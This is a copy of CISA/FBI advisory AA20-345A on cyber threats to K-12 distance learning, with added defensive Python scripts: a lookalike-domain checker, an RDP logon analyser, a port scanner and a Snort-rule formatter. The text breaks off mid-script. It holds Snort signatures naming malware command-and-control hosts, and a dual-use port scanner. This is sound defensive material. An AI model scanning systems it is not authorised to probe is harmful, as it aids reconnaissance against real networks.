AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments
Original release date: January 8, 2021. Summary: This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.
This Ale…
AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
Original release date: December 17, 2020. Summary: This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 8 framework. See the ATT&CK for Enterprise version 8 for all referenced threat actor tactics and te…
AA20-345A: Cyber Actors Target K-12 Distance Learning Education to Cause Disruptions and Steal Data
Original release date: December 10, 2020<br/><h3>Summary</h3><p>This Joint Cybersecurity Advisory was coauthored by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC).</p>
<p>The FBI, CISA, and MS-ISAC assess malicious cyber actors are targeting kindergarten through twelfth grade (K-12) educational institutions, leading to ransomware attacks, the theft of data, and the disruption of distance learning services. Cyber actors likely view schools as targets of opportunity, and these types of attacks are expected to continue through the 2020/2021 academic year. These issues will be particularly challenging for K-12 schools that face resource limitations; therefore, educational leadership, information technology personnel, and security personnel will need to balance this risk when determining their cybersecurity investments.</p>
<p><a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-345A_Joint_Cybersecurity_Advisory_Distance_Learning_S508C.pdf">Click here</a> for a PDF version of this report.</p>
<h3>Technical Details</h3><p>As of December 2020, the FBI, CISA, and MS-ISAC continue to receive reports from K-12 educational institutions about the disruption of distance learning efforts by cyber actors.</p>
<h4>Ransomware</h4>
<p>The FBI, CISA, and MS-ISAC have received numerous reports of ransomware attacks against K-12 educational institutions. In these attacks, malicious cyber actors target school computer systems, slowing access, and—in some instances—rendering the systems inaccessible for basic functions, including distance learning. Adopting tactics previously leveraged against business and industry, ransomware actors have also stolen—and threatened to leak—confidential student data to the public unless institutions pay a ransom.</p>
<p>According to MS-ISAC data, the percentage of reported ransomware incidents against K-12 schools increased at the beginning of the 2020 school year. In August and September, 57% of ransomware incidents reported to the MS-ISAC involved K-12 schools, compared to 28% of all reported ransomware incidents from January through July.</p>
<p>The five most common ransomware variants identified in incidents targeting K-12 schools between January and September 2020—based on open source information as well as victim and third-party incident reports made to MS-ISAC—are Ryuk, Maze, Nefilim, AKO, and Sodinokibi/REvil.</p>
<h4>Malware</h4>
<p>Figure 1 identifies the top 10 malware strains that have affected state, local, tribal, and territorial (SLTT) educational institutions over the past year (up to and including September 2020). Note: These malware variants are purely opportunistic as they not only affect educational institutions but other organizations as well.</p>
<p>ZeuS and Shlayer are among the most prevalent malware affecting K-12 schools.</p>
<ul>
<li>ZeuS is a Trojan with several variants that targets Microsoft Windows operating systems. Cyber actors use ZeuS to infect target machines and send stolen information to command-and-control servers.</li>
<li>Shlayer is a Trojan downloader and dropper for macOS malware. It is primarily distributed through malicious websites, hijacked domains, and malicious advertising posing as a fake Adobe Flash updater. <strong>Note: </strong>Shlayer is the only malware of the top 10 that targets macOS; the other nine affect Microsoft Windows operating systems.</li>
</ul>
<p class="text-align-center"><img alt="" data-entity-type="file" data-entity-uuid="ee5aa08d-fe73-44e6-8f7d-4b5e6ac08320" height="275" src="https://us-cert.cisa.gov/sites/default/files/publications/Top%2010%20Malware%20-%20K-12.png" width="614" /></p>
<p class="text-align-center"><cite>Figure 1: Top 10 malware affecting SLTT educational institutions</cite></p>
<h4>Distributed Denial-of-Service Attacks</h4>
<p>Cyber actors are causing disruptions to K-12 educational institutions—including third-party services supporting distance learning—with distributed denial-of-service (DDoS) attacks, which temporarily limit or prevent users from conducting daily operations. The availability of DDoS-for-hire services provides opportunities for any motivated malicious cyber actor to conduct disruptive attacks regardless of experience level. <strong>Note:</strong> DDoS attacks overwhelm servers with a high volume of internet traffic originating from many different sources, so they cannot be mitigated by blocking a single source.</p>
<h4>Video Conference Disruptions</h4>
<p>Numerous reports received by the FBI, CISA, and MS-ISAC since March 2020 indicate uninvited users have disrupted live video-conferenced classroom sessions. These disruptions have included verbally harassing students and teachers, displaying pornography and/or violent images, and doxing meeting attendees (<strong>Note: </strong>doxing is the act of compiling or publishing personal information about an individual on the internet, typically with malicious intent). To enter classroom sessions, uninvited users have been observed:</p>
<ul>
<li>Using student names to trick hosts into accepting them into class sessions, and</li>
<li>Accessing meetings from either publicly available links or links shared with outside users (e.g., students sharing links and/or passwords with friends).</li>
</ul>
<p>Video conference sessions without proper control measures risk disruption or compromise of classroom conversations and exposure of sensitive information.</p>
<h3>Additional Risks and Vulnerabilities</h3>
<p>In addition to the recent reporting of distance learning disruptions received by the FBI, CISA, and MS-ISAC, malicious cyber actors are expected to continue seeking opportunities to exploit the evolving remote learning environment.</p>
<h4>Social Engineering</h4>
<p>Cyber actors could apply social engineering methods against students, parents, faculty, IT personnel, or other individuals involved in distance learning. Tactics such as phishing trick victims into revealing personal information (e.g., passwords or bank account information) or performing a task (e.g., clicking on a link). In such scenarios, a victim could receive what appears to be a legitimate email that:</p>
<ul>
<li>Requests personally identifiable information (PII) (e.g., full name, birthdate, student ID),</li>
<li>Directs the user to confirm a password or personal identification number (PIN),</li>
<li>Instructs the recipient to visit a website that is compromised by the cyber actor, or</li>
<li>Contains an attachment with malware.</li>
</ul>
<p>Cyber actors also register web domains that are similar to legitimate websites in an attempt to capture individuals who mistype URLs or click on similar-looking URLs. These attacks are referred to as domain spoofing or typosquatting when the name is misspelled or subtly altered, and as homograph attacks when characters are swapped for look-alikes (for example the digit "1" for the letter "l", or a Cyrillic letter that renders identically to a Latin one). For example, a user wanting to access <code>www.cottoncandyschool.edu</code> could mistakenly click on <code>www.cottencandyschool.edu</code> (an "<code>o</code>" changed to an "<code>e</code>") or <code>www.cottoncandyschoo1.edu</code> (the letter "<code>l</code>" changed to the number "<code>1</code>") (<strong>Note:</strong> this is a fictitious example to show how a user can click through to a website without noticing subtle changes in the URL). Victims believe they are on a legitimate website when, in reality, they are visiting a site controlled by a cyber actor.</p>
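<p>As an added example (not part of the advisory), the following Python script triages observed hostnames, such as those pulled from proxy or DNS logs, against a legitimate school domain using the two mechanisms just described: it folds look-alike characters (digits for letters, a small assumed subset of Cyrillic homoglyphs, Punycode labels) before comparing, and it measures one-keystroke typos with an edit distance. It also catches the legitimate name embedded as a subdomain of an attacker's domain. The confusable tables and the single-label suffix handling are simplifying assumptions; the demo hostnames are constructed around the advisory's fictitious <code>cottoncandyschool.edu</code>.</p>

```python
"""Lookalike-domain triage for the typosquatting and homograph risk described above.

Added example, not code from the advisory. The confusable tables are a small
assumed subset (a production check would use a full Unicode confusables list
and the Public Suffix List); 'cottoncandyschool.edu' is the advisory's own
fictitious domain and every candidate hostname below is constructed.
"""
import unicodedata

# Assumed ASCII substitutions seen in typosquats: digit-for-letter and multi-character tricks.
ASCII_CONFUSABLES = {"0": "o", "1": "l", "3": "e", "5": "s", "vv": "w", "rn": "m", "cl": "d"}
# Assumed subset of Cyrillic letters that render like Latin ones in an IDN label.
CYRILLIC_CONFUSABLES = {"\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
                        "\u0441": "c", "\u0443": "y", "\u0445": "x"}


def decode_label(label):
    """Turn a Punycode label (xn--...) back into Unicode so homoglyphs can be compared."""
    if label.startswith("xn--"):
        try:
            return label.encode("ascii").decode("idna")
        except UnicodeError:
            return label
    return label


def registrable_parts(hostname):
    """Split 'www.example.edu' into ('example', 'edu').
    Assumes a single-label public suffix; co.uk-style suffixes need the PSL."""
    labels = [decode_label(l) for l in hostname.lower().rstrip(".").split(".")]
    if len(labels) < 2:
        return labels[0], ""
    return labels[-2], labels[-1]


def skeleton(label):
    """Collapse confusable characters so visually similar labels compare equal."""
    s = "".join(CYRILLIC_CONFUSABLES.get(ch, ch) for ch in label)
    # NFKD + ASCII strip folds accented lookalikes such as 'é' to 'e'.
    s = unicodedata.normalize("NFKD", s).encode("ascii", "ignore").decode()
    for lookalike, real in ASCII_CONFUSABLES.items():
        s = s.replace(lookalike, real)
    return s


def edit_distance(a, b):
    """Damerau-Levenshtein (optimal string alignment) distance: one substitution,
    insertion, deletion or adjacent swap counts as a single typo."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def classify(candidate, legitimate, max_typos=1):
    """Return one of: legitimate, embedded-lookalike, suffix-swap, homograph, typosquat, unrelated."""
    host = candidate.lower().rstrip(".")
    l_label, l_suffix = registrable_parts(legitimate)
    legit = f"{l_label}.{l_suffix}"
    # 'cottoncandyschool.edu.evil.com': the real name appears, but only as a subdomain of the attacker's.
    if legit in host and host != legit and not host.endswith("." + legit):
        return "embedded-lookalike"
    c_label, c_suffix = registrable_parts(host)
    if (c_label, c_suffix) == (l_label, l_suffix):
        return "legitimate"
    if c_label == l_label:
        return "suffix-swap"          # same name under a different TLD
    if skeleton(c_label) == skeleton(l_label):
        return "homograph"            # visually identical after confusable folding
    if edit_distance(c_label, l_label) <= max_typos:
        return "typosquat"            # one keystroke away
    return "unrelated"


def triage(hostnames, legitimate):
    """Classify a batch of observed hostnames against the real domain."""
    return [(h, classify(h, legitimate)) for h in hostnames]


if __name__ == "__main__":
    # Constructed candidates; the Cyrillic 'о' (U+043E) in the fourth one is invisible when rendered.
    observed = ["www.cottoncandyschool.edu", "www.cottencandyschool.edu",
                "www.cottoncandyschoo1.edu", "www.c\u043ettoncandyschool.edu",
                "cottoncandyschool.com", "cottoncandyschool.edu.evil.com", "www.otherdistrict.org"]
    for host, verdict in triage(observed, "cottoncandyschool.edu"):
        print(f"{verdict:20} {host}")
```

<p>The skeleton comparison is what separates a homograph from a typo: <code>cottoncandyschoo1</code> folds to the real label and is flagged even though its edit distance is the same as a genuine misspelling, while the Cyrillic case would pass any ASCII-only string comparison.</p>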
<h4>Technology Vulnerabilities and Student Data</h4>
<p>Whether as collateral for ransomware attacks or to sell on the dark web, cyber actors may seek to exploit the data-rich environment of student information in schools and education technology (edtech) services. The need for schools to rapidly transition to distance learning likely contributed to cybersecurity gaps, leaving schools vulnerable to attack. In addition, educational institutions that have outsourced their distance learning tools may have lost visibility into data security measures. Cyber actors could view the increased reliance on—and sharp usership growth in—these distance learning services and student data as lucrative targets.</p>
<h4>Open/Exposed Ports</h4>
<p>The FBI, CISA, and MS-ISAC frequently see malicious cyber actors exploiting exposed Remote Desktop Protocol (RDP) services to gain initial access to a network and, often, to manually deploy ransomware. For example, cyber actors will attack ports 445 (Server Message Block [SMB]) and 3389 (RDP) to gain network access. They are then positioned to move laterally throughout a network (often using SMB), escalate privileges, access and exfiltrate sensitive information, harvest credentials, or deploy a wide variety of malware. This popular attack vector allows cyber actors to maintain a low profile, as they are using a legitimate network service that provides them with the same functionality as any other remote user.</p>
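<p>The detection side of this, as an added example not taken from the advisory: the Python below runs over a constructed, simplified export of Windows Security events 4625 (failed logon) and 4624 (successful logon; LogonType 10 is RDP) and flags a failed-logon burst from one address, a subsequent successful RDP logon from that same address, and any RDP logon from outside assumed internal ranges. The thresholds, the internal ranges and the key=value line format are assumptions for the example; in production the same fields come from the Security event log or a forwarded-events collector.</p>

```python
"""Detection logic for the exposed-RDP pattern described above, run over
constructed Windows Security event lines.

Added example, not code from the advisory. The input format is a simplified
key=value export of events 4624 (successful logon) and 4625 (failed logon);
the thresholds and the 'internal' address ranges are assumptions for this example.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import ipaddress

# Assumed internal ranges. ipaddress.is_private is deliberately not used: it also
# treats documentation ranges such as 203.0.113.0/24 as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
FAIL_THRESHOLD = 5               # failed logons from one source address ...
WINDOW = timedelta(minutes=10)   # ... inside this window are treated as a brute-force attempt
REMOTE_INTERACTIVE = "10"        # LogonType 10 = RDP; 3 = network (SMB, WinRM)

# Constructed sample: a burst of failures then a success from one external address,
# a normal internal RDP logon, an RDP logon from outside, and one stray SMB failure.
SAMPLE_EVENTS = """\
2020-12-01T02:10:01Z EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.45
2020-12-01T02:10:03Z EventID=4625 LogonType=10 TargetUserName=admin IpAddress=203.0.113.45
2020-12-01T02:10:04Z EventID=4625 LogonType=10 TargetUserName=student IpAddress=203.0.113.45
2020-12-01T02:10:06Z EventID=4625 LogonType=10 TargetUserName=teacher IpAddress=203.0.113.45
2020-12-01T02:10:09Z EventID=4625 LogonType=10 TargetUserName=itadmin IpAddress=203.0.113.45
2020-12-01T02:11:30Z EventID=4624 LogonType=10 TargetUserName=itadmin IpAddress=203.0.113.45
2020-12-01T08:02:11Z EventID=4624 LogonType=10 TargetUserName=jsmith IpAddress=10.20.30.40
2020-12-01T08:15:00Z EventID=4624 LogonType=10 TargetUserName=jsmith IpAddress=198.51.100.7
2020-12-01T09:00:00Z EventID=4625 LogonType=3 TargetUserName=backup IpAddress=10.20.30.41
""".splitlines()


def parse_event(line):
    """'<ISO timestamp> Key=Value ...' -> dict with a datetime under 'time'."""
    timestamp, *fields = line.split()
    event = {"time": datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%SZ")}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def analyze(lines):
    """Return (kind, source_ip, detail) findings in event-time order."""
    findings = []
    recent_failures = defaultdict(deque)   # source IP -> timestamps of 4625s inside WINDOW
    bruteforce_sources = set()
    events = sorted((parse_event(l) for l in lines if l.strip()), key=lambda e: e["time"])
    for ev in events:
        ip = ev.get("IpAddress", "-")
        if ev["EventID"] == "4625":
            window = recent_failures[ip]
            window.append(ev["time"])
            while window and ev["time"] - window[0] > WINDOW:
                window.popleft()
            if len(window) >= FAIL_THRESHOLD and ip not in bruteforce_sources:
                bruteforce_sources.add(ip)
                findings.append(("bruteforce", ip, f"{len(window)} failed logons within {WINDOW}"))
        elif ev["EventID"] == "4624" and ev.get("LogonType") == REMOTE_INTERACTIVE:
            user = ev.get("TargetUserName", "?")
            if ip in bruteforce_sources:
                # Highest priority: a guessing burst that ended in a successful RDP session.
                findings.append(("bruteforce-success", ip, f"RDP logon as {user} after failed-logon burst"))
            elif ip != "-" and not is_internal(ip):
                findings.append(("external-rdp-logon", ip, f"RDP logon as {user} from outside internal ranges"))
    return findings


if __name__ == "__main__":
    for kind, ip, detail in analyze(SAMPLE_EVENTS):
        print(f"{kind:20} {ip:15} {detail}")
```

<p>The single LogonType 3 failure at the end is left alone on purpose: one SMB authentication failure is noise, whereas the same count from one address inside the window would trip the same rule, which is the point of keying on source address rather than on target account.</p>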
<h4>End-of-Life Software</h4>
<p>End-of-Life (EOL) software is regularly exploited by cyber actors—often to gain initial access, deface websites, or further their reach in a network. Once a product reaches EOL, customers no longer receive security updates, technical support, or bug fixes. Unpatched and vulnerable servers are likely to be exploited by cyber actors, hindering an organization’s operational capacity.</p>
<h3>Mitigations</h3><h4>Plans and Policies</h4>
<p>The FBI and CISA encourage educational providers to maintain business continuity plans—the practice of executing essential functions through emergencies (e.g., cyberattacks)—to minimize service interruptions. Without planning, provision, and implementation of continuity principles, institutions may be unable to continue teaching and administrative operations. Evaluating continuity and capability will help identify potential operational gaps. Through identifying and addressing these gaps, institutions can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies. The FBI and CISA suggest K-12 educational institutions review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by cyber actors.</p>
<h4>Network Best Practices</h4>
<ul>
<li>Patch operating systems, software, and firmware as soon as manufacturers release updates.</li>
<li>Review the configuration baseline for every operating system version on institution-owned assets, so that problems do not arise that local users cannot fix themselves because local administrator rights are disabled.</li>
<li>Regularly change passwords to network systems and accounts and avoid reusing passwords for different accounts.</li>
<li>Use multi-factor authentication where possible.</li>
<li>Disable unused remote access/RDP ports and monitor remote access/RDP logs.</li>
<li>Implement application and remote access allow listing to only allow systems to execute programs known and permitted by the established security policy.</li>
<li>Audit user accounts with administrative privileges and configure access controls with least privilege in mind.</li>
<li>Audit logs to ensure new accounts are legitimate.</li>
<li>Scan for open or listening ports and remediate (close or restrict) those that are not needed.</li>
<li>Identify critical assets such as student database servers and distance learning infrastructure; create backups of these systems and house the backups offline from the network.</li>
<li>Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment.</li>
<li>Set antivirus and anti-malware solutions to automatically update; conduct regular scans.</li>
</ul>
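<p>One way to act on the port-scanning item above, as an added example rather than code from the advisory: a TCP connect scanner that reports which ports are listening on a host and pairs the advisory's two problem ports (445/SMB, 3389/RDP) with a short risk note. The port list and the notes are assumptions; the script includes a throwaway loopback listener so it can be tried offline, and it should only be pointed at hosts you are authorized to scan.</p>

```python
"""TCP connect scan for the 'scan for open or listening ports' item above.

Added example, not code from the advisory. The port list and the risk notes are
assumptions drawn from the advisory's text (445/SMB and 3389/RDP); it is a plain
connect() scan, so run it only against hosts you are authorised to test.
"""
import socket
from concurrent.futures import ThreadPoolExecutor

# Ports the advisory singles out, plus a few that are commonly left exposed (assumed list).
RISKY_PORTS = {
    445: "SMB: lateral-movement and ransomware-deployment path; never internet-facing",
    3389: "RDP: initial-access vector; reach it only through VPN with MFA",
    139: "NetBIOS session service: legacy SMB transport",
    23: "Telnet: clear-text remote administration",
    5900: "VNC: remote desktop, often without MFA",
}
DEFAULT_PORTS = sorted(RISKY_PORTS) + [22, 80, 443, 3306, 8080]


def port_open(host, port, timeout=0.5):
    """True if a TCP handshake completes, i.e. something is listening."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def scan_host(host, ports=DEFAULT_PORTS, timeout=0.5, workers=32):
    """Return the sorted list of listening ports on host."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, port_open(host, p, timeout)), ports))
    return sorted(p for p, is_open in results if is_open)


def assess(open_ports):
    """Pair each listening port with the advisory-derived note, or a generic review prompt."""
    return [(p, RISKY_PORTS.get(p, "confirm this service must be reachable; close it otherwise"))
            for p in open_ports]


def start_local_listener():
    """Open a throwaway listener on 127.0.0.1 so the scanner can be exercised offline.
    Returns (socket, port); close the socket when done."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


def free_local_port():
    """Pick a port that is currently not listening on 127.0.0.1 (bind, read, release)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    listener, port = start_local_listener()
    try:
        found = scan_host("127.0.0.1", DEFAULT_PORTS + [port])
        for p, note in assess(found):
            print(f"{p:>5}/tcp  {note}")
    finally:
        listener.close()
```

<p>A connect scan only tells you that something answers; follow up on 445 and 3389 by checking the host firewall and the perimeter NAT rules, since the advisory's point is reachability from outside, not merely that the service is running.</p>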
<h4>User Awareness Best Practices</h4>
<ul>
<li>Focus on awareness and training. Because end users are targeted, make employees and students aware of the threats—such as ransomware and phishing scams—and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.</li>
<li>Ensure employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.</li>
<li>Monitor privacy settings and information available on social networking sites.</li>
</ul>
<h4>Ransomware Best Practices</h4>
<p>The FBI and CISA do not recommend paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. However, regardless of whether your organization decided to pay the ransom, the FBI urges you to report ransomware incidents to your local FBI field office. Doing so provides the FBI with the critical information they need to prevent future attacks by identifying and tracking ransomware attackers and holding them accountable under U.S. law.</p>
<p>In addition to implementing the above network best practices, the FBI and CISA also recommend the following:</p>
<ul>
<li>Regularly back up data, air gap, and password protect backup copies offline.</li>
<li>Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location.</li>
</ul>
<h4>Denial-of-Service Best Practices</h4>
<ul>
<li>Consider enrolling in a denial-of-service mitigation service that detects abnormal traffic flows and redirects traffic away from your network.</li>
<li>Create a partnership with your local internet service provider (ISP) prior to an event and work with your ISP to control network traffic attacking your network during an event.</li>
<li>Configure network firewalls to block unauthorized IP addresses and disable port forwarding.</li>
</ul>
<h4>Video-Conferencing Best Practices</h4>
<ul>
<li>Ensure participants use the most updated version of remote access/meeting applications.</li>
<li>Require passwords for session access.</li>
<li>Encourage students to avoid sharing passwords or meeting codes.</li>
<li>Establish a vetting process to identify participants as they arrive, such as a waiting room.</li>
<li>Establish policies to require participants to sign in using true names rather than aliases.</li>
<li>Ensure only the host controls screensharing privileges.</li>
<li>Implement a policy to prevent participants from entering rooms prior to host arrival and to prevent the host from exiting prior to the departure of all participants.</li>
</ul>
<h4>Edtech Implementation Considerations</h4>
<p>When partnering with third-party and edtech services to support distance learning, educational institutions should consider the following:</p>
<ul>
<li>The service provider’s cybersecurity policies and response plan in the event of a breach and their remediation practices:
<ul>
<li>How did the service provider resolve past cyber incidents? How did their cybersecurity practices change after these incidents?</li>
</ul>
</li>
<li>The provider’s data security practices for their products and services (e.g., data encryption in transit and at rest, security audits, security training of staff, audit logs);</li>
<li>The provider’s data maintenance and storage practices (e.g., use of company servers, cloud storage, or third-party services);</li>
<li>Types of student data the provider collects and tracks (e.g., PII, academic, disciplinary, medical, biometric, IP addresses);</li>
<li>Entities to whom the provider will grant access to the student data (e.g., vendors);</li>
<li>How the provider will use student data (e.g., will they sell it to—or share it with—third parties for service enhancement, new product development, studies, marketing/advertising?);</li>
<li>The provider’s de-identification practices for student data; and</li>
<li>The provider’s policies on data retention and deletion.</li>
</ul>
<h4>Malware Defense</h4>
<p>Table 1 identifies CISA-created Snort signatures, which have been successfully used to detect and defend against related attacks, for the malware variants listed below. The <code>sid:00000000</code> and <code><unique_ID></code> values are placeholders: assign each rule a unique SID (local rules conventionally use 1,000,000 and above) and a unique flowbit name before loading it. <strong>Note:</strong> the listing is not fully comprehensive and should not be used at the exclusion of other detection methods.</p>
<p class="text-align-center"><em>Table 1: Malware signatures</em></p>
<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 881.46px; height: 312px; margin-right: auto; margin-left: auto;">
<thead>
<tr>
<th scope="col" style="width: 198px;"><strong>Malware</strong></th>
<th scope="col" style="width: 356px;"><strong>Signature</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td style="width: 198px; text-align: left;"><strong>NanoCore</strong></td>
<td style="width: 356px; text-align: left;"><code>alert tcp any any -> any $HTTP_PORTS (msg:"NANOCORE:HTTP GET URI contains 'FAD00979338'"; sid:00000000; rev:1; flow:established,to_server; content:"GET"; http_method; content:"getPluginName.php?PluginID=FAD00979338"; fast_pattern; http_uri; classtype:http-uri; metadata:service http;)</code></td>
</tr>
<tr>
<td style="width: 198px; text-align: left;"><strong>Cerber</strong></td>
<td style="width: 356px; text-align: left;"><code>alert tcp any any -> any $HTTP_PORTS (msg:"HTTP Client Header contains 'host|3a 20|polkiuj.top'"; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,<unique_ID>.tagged; content:"host|3a 20|polkiuj.top|0d 0a|"; http_header; fast_pattern:only; flowbits:set,<unique_ID>.tagged; tag:session,10,packets; classtype:http-header; metadata:service http;)</code></td>
</tr>
<tr>
<td style="width: 198px; text-align: left;"><strong>Kovter</strong></td>
<td style="width: 356px; text-align: left;"><code>alert tcp any any -> any $HTTP_PORTS (msg:"Kovter:HTTP URI POST to CnC Server"; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,<unique_ID>.tagged; content:"POST / HTTP/1.1"; depth:15; content:"Content-Type|3a 20|application/x-www-form-urlencoded"; http_header; depth:47; fast_pattern; content:"User-Agent|3a 20|Mozilla/"; http_header; content:!"LOADCURRENCY"; nocase; content:!"Accept"; http_header; content:!"Referer|3a|"; http_header; content:!"Cookie|3a|"; nocase; http_header; pcre:"/^(?:[A-Za-z0-9+\/]{4})*(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{4})$/P"; pcre:"/User-Agent\x3a[^\r\n]+\r\nHost\x3a\x20(?:\d{1,3}\.){3}\d{1,3}\r\nContent-Length\x3a\x20[1-5][0-9]{2,3}\r\n(?:Cache-Control|Pragma)\x3a[^\r\n]+\r\n(?:\r\n)?$/H"; flowbits:set,<unique_ID>.tagged; tag:session,10,packets; classtype:nonstd-tcp; metadata:service http;)</code></td>
</tr>
<tr>
<td style="width: 198px; text-align: left;"><strong>Dridex</strong></td>
<td style="width: 356px; text-align: left;">
<p><code>alert tcp any any -> any $HTTP_PORTS (msg:"HTTP URI GET contains 'invoice_########.doc' (DRIDEX)"; sid:00000000; rev:1; flow:established,to_server; content:"invoice_"; http_uri; fast_pattern:only; content:".doc"; nocase; distance:8; within:4; content:"GET"; nocase; http_method; classtype:http-uri; metadata:service http;)<br />
alert tcp any any -> any $HTTP_PORTS (msg:"HTTP Client Header contains 'Host|3a 20|tanevengledrep ru' (DRIDEX)"; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,<unique_ID>.tagged; content:"Host|3a 20|tanevengledrep|2e|ru|0d 0a|"; http_header; fast_pattern:only; flowbits:set,<unique_ID>.tagged; tag:session,10,packets; classtype:http-header; metadata:service http;)</code></p>
</td>
</tr>
</tbody>
</table>
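<p>Before these rules go into a Snort sensor, two things in Table 1 have to change: every <code>sid:00000000</code> must become a unique SID (local rules conventionally use 1,000,000 and up) and every <code><unique_ID></code> flowbit name must be made unique, otherwise Snort rejects the duplicate SIDs and the rules would share state. The <code>classtype</code> values <code>http-uri</code>, <code>http-header</code> and <code>nonstd-tcp</code> are also not in Snort's stock <code>classification.config</code> and have to be declared there. The Python below, an added example rather than CISA's code, performs that rewrite over two of the Table 1 rules (reproduced with their placeholders) and runs a few static sanity checks; the SID range, the flowbit prefix and the stock-classtype list are assumptions.</p>

```python
"""Preparing the Table 1 Snort signatures for deployment.

Added example, not code from the advisory. The rules below are two of the
advisory's signatures reproduced with their placeholders; the local SID range,
the flowbit prefix and the list of stock classtypes are assumptions for this example.
"""
import re

PLACEHOLDER_SID = re.compile(r"\bsid:0+;")      # 'sid:00000000;' as published
FLOWBIT_PLACEHOLDER = "<unique_ID>"
CLASSTYPE = re.compile(r"classtype:([\w-]+);")
# Assumed subset of the classtypes shipped in Snort's stock classification.config.
STOCK_CLASSTYPES = {"trojan-activity", "attempted-admin", "attempted-user", "attempted-recon",
                    "successful-admin", "successful-user", "web-application-attack",
                    "policy-violation", "misc-activity", "bad-unknown", "unknown", "not-suspicious"}

SAMPLE_RULES = r'''
alert tcp any any -> any $HTTP_PORTS (msg:"NANOCORE:HTTP GET URI contains 'FAD00979338'"; sid:00000000; rev:1; flow:established,to_server; content:"GET"; http_method; content:"getPluginName.php?PluginID=FAD00979338"; fast_pattern; http_uri; classtype:http-uri; metadata:service http;)
alert tcp any any -> any $HTTP_PORTS (msg:"HTTP Client Header contains 'Host|3a 20|tanevengledrep ru' (DRIDEX)"; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,<unique_ID>.tagged; content:"Host|3a 20|tanevengledrep|2e|ru|0d 0a|"; http_header; fast_pattern:only; flowbits:set,<unique_ID>.tagged; tag:session,10,packets; classtype:http-header; metadata:service http;)
'''


def split_rules(text):
    return [line.strip() for line in text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")]


def validate(rule):
    """Cheap static checks that catch what Snort would reject or what would misfire."""
    issues = []
    if not rule.startswith(("alert ", "drop ", "log ", "pass ")):
        issues.append("unknown rule action")
    if " (" not in rule or not rule.endswith(")"):
        issues.append("missing option block")
    if rule.count('"') % 2:
        issues.append("unbalanced quotes")
    for opt in ("msg:", "sid:", "rev:"):
        if opt not in rule:
            issues.append(f"missing {opt}")
    if PLACEHOLDER_SID.search(rule):
        issues.append("placeholder sid:0 must be replaced")
    if FLOWBIT_PLACEHOLDER in rule:
        issues.append("flowbit placeholder <unique_ID> must be replaced")
    if "flowbits:set," in rule and "flowbits:isnotset," not in rule:
        issues.append("flowbits:set without an isnotset guard; the rule will re-fire on every packet")
    return issues


def prepare_rules(text, start_sid=1000000, flowbit_prefix="aa20_345a"):
    """Assign unique SIDs and flowbit names, validate, and list the classtype
    definitions that must be added to classification.config.
    Returns (ready_rules, [(rule_head, issues)], config_lines)."""
    ready, problems, classtypes = [], [], set()
    sid = start_sid
    for rule in split_rules(text):
        rule = rule.replace(FLOWBIT_PLACEHOLDER, flowbit_prefix)
        if PLACEHOLDER_SID.search(rule):
            rule = PLACEHOLDER_SID.sub(f"sid:{sid};", rule, count=1)
            sid += 1
        match = CLASSTYPE.search(rule)
        if match:
            classtypes.add(match.group(1))
        issues = validate(rule)
        if issues:
            problems.append((rule[:60], issues))
        else:
            ready.append(rule)
    config = [f"config classification: {name},CISA {name} signature match,2"
              for name in sorted(classtypes - STOCK_CLASSTYPES)]
    return ready, problems, config


if __name__ == "__main__":
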